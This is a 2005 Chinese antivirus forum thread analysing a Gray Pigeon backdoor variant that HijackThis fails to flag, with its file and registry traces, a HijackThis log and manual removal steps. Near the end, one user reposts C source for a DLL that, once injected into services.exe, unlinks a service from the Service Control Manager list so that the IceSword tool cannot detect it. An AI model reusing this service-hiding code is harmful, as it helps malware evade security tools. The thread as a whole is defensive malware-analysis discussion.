瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 一只HijackThis看不见的灰鸽子
baohe - 2005-12-1 21:13:00


这只鸽子感染系统后,仅在%windows%目录下释放一个notepad.exe.tmp文件。

1、在Icesword进程列表中可见鸽子的进程(图1)。但在WINDOWS模式下,HijackThis1.99.1日志中无任何异常。
2、这只鸽子在注册表HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES分支添加系统服务项(见图2)。
3、notepad.exe.tmp运行后插入explorer.exe(资源管理器进程)和iexplore.exe进程。但进程列表中无iexplore.exe出现(旧版的鸽子感染系统,即使不打开IE,仍可见iexplore.exe进程。)
4、自动连接网络。

5、卡巴斯基今天的病毒库以及“灰鸽子全版清除器”都查不到这只鸽子。
————————————————
查杀:
1、结束notepad.exe.tmp进程
2、删除%windows%目录下的notepad.exe.tmp
3、删除注册表HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\SERVICES分支中鸽子添加系统服务项
4、重启系统



图1


附件: 1558472005121211359.jpg
baohe - 2005-12-1 21:14:00
图2

附件: 1558472005121211436.jpg
endurer - 2005-12-1 21:41:00
HijackThis的LOG的O23项没有列出此灰鸽子的系统服务启动项?
baohe - 2005-12-1 21:46:00
引用:
【endurer的贴子】HijackThis的LOG的O23项没有列出此灰鸽子的系统服务启动项?
...........................


这是我用样本感染系统后的HijackThis1.99.1的日志:

Logfile of HijackThis v1.99.1
Scan saved at 19:58:02, on 2005-12-1
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\PFShared\UmxCfg.exe
C:\Program Files\Tiny Firewall Pro\UmxFwHlp.exe
C:\Program Files\Common Files\PFShared\UmxPol.exe
C:\Program Files\Tiny Firewall Pro\UmxAgent.exe
C:\Program Files\Tiny Firewall Pro\UmxTray.exe
C:\Program Files\System Safety Monitor\SSMService.exe
C:\Program Files\Common Files\PFShared\umxlu.exe
C:\Program Files\System Safety Monitor\sysSafe.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus for Workstation\avpcc.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Tiny Firewall Pro\amon.exe
C:\Program Files\Opera76\opera.exe
C:\Program Files\HijackThis.exe

O2 - BHO: HelperObject Class - {00C6482D-C502-44C8-8409-FCE54AD9C208} - C:\Program Files\TechSmith\SnagIt 7\SnagItBHO.dll
O2 - BHO: QQIEHelper - {54EBD53A-9BC1-480B-966A-843A333CA162} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FlashGet\jccatch.dll
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - Toolbar: SnagIt - {8FF5E183-ABDE-46EB-B09E-D2AAB95CABE3} - C:\Program Files\TechSmith\SnagIt 7\SnagItIEAddin.dll
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [AMonitor] C:\Program Files\Tiny Firewall Pro\amon.exe
O4 - Startup: 腾讯QQ.lnk = C:\Program Files\Tencent\QQ\QQ.exe
O8 - Extra context menu item: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: 添加到QQ自定义面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - C:\Program Files\Tencent\QQ\SendMMS.htm
O16 - DPF: {3D8F74EE-8692-4F8F-B8D2-7522E732519E} (WebActivater Control) - http://game.qq.com/QQGame2.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1122803781773
O20 - Winlogon Notify: PFW - C:\WINDOWS\SYSTEM32\UmxWnp.Dll
O20 - Winlogon Notify: System Safety Monitor - C:\WINDOWS\SYSTEM32\SSMWinlogonEx.dll
O23 - Service: System Safety Monitor (SSM) - System Safety - C:\Program Files\System Safety Monitor\SSMService.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2004\WinStylerThemeSvc.exe
O23 - Service: FW Event Manager (UmxAgent) - Tiny Software, Inc. - C:\Program Files\Tiny Firewall Pro\UmxAgent.exe
O23 - Service: FW Configuration Interpreter (UmxCfg) - Tiny Software, Inc. - C:\Program Files\Common Files\PFShared\UmxCfg.exe
O23 - Service: FW User-Mode Helper (UmxFwHlp) - Tiny Software, Inc. - C:\Program Files\Tiny Firewall Pro\UmxFwHlp.exe
O23 - Service: FW Live Update (UmxLU) - Tiny Software, Inc. - C:\Program Files\Common Files\PFShared\umxlu.exe
O23 - Service: FW Policy Manager (UmxPol) - Tiny Software Inc. - C:\Program Files\Common Files\PFShared\UmxPol.exe

建能 - 2005-12-1 21:55:00
在你的任务管理器有这个NOTEPAD.exe进程吗?
建能 - 2005-12-1 21:58:00
NOTEPAD.exe是记事本进程,这个灰鸽子插入了这个进程,那应该好发现。
baohe - 2005-12-1 22:00:00
引用:
【建能的贴子】在你的任务管理器有这个NOTEPAD.exe进程吗?
...........................

看任务管理器意义不大。HijackThis1.99.1扫完日志后,自动调notepad.exe显示扫描结果。所以WINDOWS任务管理器中应该有notepad.exe进程。只有进程,没有路径,无法判断notepad.exe进程是否异常。倒是icesword的进程列表管用(见图1)
baohe - 2005-12-1 22:02:00
引用:
【建能的贴子】NOTEPAD.exe是记事本进程,这个灰鸽子插入了这个进程,那应该好发现。
...........................

注意看图1。
不是鸽子插入NOTEPAD.exe;而是鸽子模仿NOTEPAD.exe。
七彩黄花菜萱草 - 2005-12-1 22:18:00
斑竹,SREng的日志能看得出异常吗?我觉得SREng的日志更详尽些,请赐教.谢谢
baohe - 2005-12-1 22:23:00
引用:
【七彩黄花菜萱草的贴子】斑竹,SREng的日志能看得出异常吗?我觉得SREng的日志更详尽些,请赐教.谢谢
...........................

现在家里,系统中没有SREng。明天在单位的机子上观察一下。
endurer - 2005-12-1 22:35:00
HijackThis的LOG中O23没报告...

如果在安全模式下扫描呢?
猎鹰渔民 - 2005-12-1 22:44:00
引用:
【七彩黄花菜萱草的贴子】斑竹,SREng的日志能看得出异常吗?我觉得SREng的日志更详尽些,请赐教.谢谢
...........................
我也想问一下,最近才觉得SREng比HjackThis好用多了
花落花又开 - 2005-12-1 22:53:00
已阅.
tonnyblue - 2005-12-2 8:17:00
小顶一下啊!
玉面修罗 - 2005-12-2 9:17:00
不错。。
独孤豪侠 - 2005-12-2 9:24:00
收藏~~~~~~~
幽灵行动 - 2005-12-2 9:43:00
收到
qiansui - 2005-12-2 11:30:00
我的HijackThis也中毒了

附件: 6151292005122113056.jpg
闪电风暴 - 2005-12-2 13:08:00
伪装好了点,不过查杀也容易了些
taylor05771 - 2005-12-2 13:34:00
这只鸽子最终还是被人公布了.....
taylor05771 - 2005-12-2 13:37:00
好像在黑客内部 用了3个月 不知谁公布的
据我所知
应该还有一只的....
hijackthis也不是万能的

kvirus - 2005-12-2 13:56:00
网警,看来好东东得秘密开发,秘密使用哈哈

对付这个SREng呢?
baohe - 2005-12-2 15:06:00
引用:
【taylor05771的贴子】好像在黑客内部 用了3个月 不知谁公布的
据我所知
应该还有一只的....
hijackthis也不是万能的


...........................


没有万能的安全软件。安全软件的选择:
1、用户根据自己的实际情况,对其总体防护效果的评价。
2、用户的个人爱好。
taylor05771 - 2005-12-2 16:37:00
听说还有躲SSM的 鸽子 呵呵
可惜没搞到样本
baohe - 2005-12-2 16:39:00
引用:
【taylor05771的贴子】听说还有躲SSM的 鸽子 呵呵
可惜没搞到样本
...........................

不知道有没有能躲过TPF2005的Track'nReverse的鸽子。
如果你有,请务必给我一个。我想看看。
hellokiddy - 2005-12-2 17:22:00
道高一尺,魔高一丈
子阳 - 2005-12-2 19:12:00
学习了.
风情 - 2005-12-2 19:20:00
楼主,不会是这个文件吧?


附件: 3949942005122192055.JPG
taylor05771 - 2005-12-2 19:39:00
引用:
【baohe的贴子】
不知道有没有能躲过TPF2005的Track''nReverse的鸽子。
如果你有,请务必给我一个。我想看看。
...........................

刚才在火狐论坛 看到一个躲避icesword的办法应该还算不错的东西.所谓的附件 论坛无法上传 没办法
先公布代码
在icesword下隐藏服务
作者:xfreeboy
上次看到wineggdrog有在讨论icesword是如何检测服务的。
虽然我不知道icesword是什么样列举服务的,但估计最终也是通过历遍SCM内部的ServiceRecordList来检测。
为什么呢?看下面。
用附件中的InjectDLL.exe把hideservice.dll注入到Services.exe进程后就会把Alerter服务隐藏掉。用icesword也检测不出Alerter服务了。
代码原理很简单,就是在Services.exe进程找到ServiceRecordList表,将需要隐藏的服务从链表上断开。
既然icesword也检测不出了,那就说明icesword最终也是通过历遍SCM内部的ServiceRecordList来检测.
好像最先是听到EVA讲的。
以下是dll的代码,网上找到的,拿来就用。
CODE:  [Copy to clipboard]
--------------------------------------------------------------------------------

#include <stdio.h>
#include <windows.h>
#include <string.h>

typedef struct _FAKE_SERVICE_RECORD {
    struct _FAKE_SERVICE_RECORD  *Prev;          // linked list
    struct _FAKE_SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    //
} FAKE_SERVICE_RECORD, *PFAKE_SERVICE_RECORD, *LPFAKE_SERVICE_RECORD;

void seArchDWORD(int Addr);
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReAson,LPVOID lpvReserved)
{
switch (fdwReAson){
 
case DLL_PROCESS_ATTACH:
  { 
  FILE* pFile;
  pFile = fopen("c:\\seArch.txt","a+");
  fputs("begin\n",pFile);
  fclose(pFile);
  int i;
  for (i = 0x300000;i<0x5000000;i+=4){
    printf("%x\n",i);
    __try{
    if (0 == wcscmp((const unsigned short *)i,L"Alerter")){
      char temp [32];
      sprintf(temp,"found Alerter At: %x\n",i);
      FILE* pFile;
      pFile = fopen("c:\\seArch.txt","a+");
      fputs(temp,pFile);
      fclose(pFile);
      seArchDWORD(i);
      //break;
    }
    }
    __except(EXCEPTION_EXECUTE_HANDLER ){
    printf("error\n");
    i-=4;
    i += 0x1000;
    //_getche();
    }
  }


  }
case DLL_THREAD_ATTACH:
  break;
case DLL_THREAD_DETACH:
  break;
case DLL_PROCESS_DETACH:
  break;
}
return TRUE;
}
//--------------------------------------------------------------------
void seArchDWORD(int Addr)
{
int i;
for (i = 0x300000;i<0x5000000;i+=4){
  printf("%x\n",i);
  __try{
  if (Addr == *(ULONG*)i){
    char temp [32];
    sprintf(temp,"found the point At: %x\n",i);
    FILE* pFile;
    pFile = fopen("c:\\seArch.txt","a+");
    fputs(temp,pFile);
    fputws((const unsigned short *)(*(ULONG*)(i+4)),pFile);
    fputs("\n",pFile);
    fclose(pFile);
    //break;
    if (0 == wcscmp((const unsigned short *)(*(ULONG*)(i+4)),L"Alerter")){
    //found the right one
    PFAKE_SERVICE_RECORD pRecord;
    pRecord = (PFAKE_SERVICE_RECORD)(i-8);
    *((DWORD*)pRecord->Prev+1) = (DWORD)(pRecord->Next);
    *((DWORD*)pRecord->Next) = (DWORD)(pRecord->Prev);
    }
  }
  }
  __except(EXCEPTION_EXECUTE_HANDLER ){
  printf("error\n");
  i-=4;
  i += 0x1000;
  //_getche();
  }
}

}

影子110 - 2005-12-2 19:41:00
12
查看完整版本: 一只HijackThis看不见的灰鸽子
© 2000 - 2026 Rising Corp. Ltd.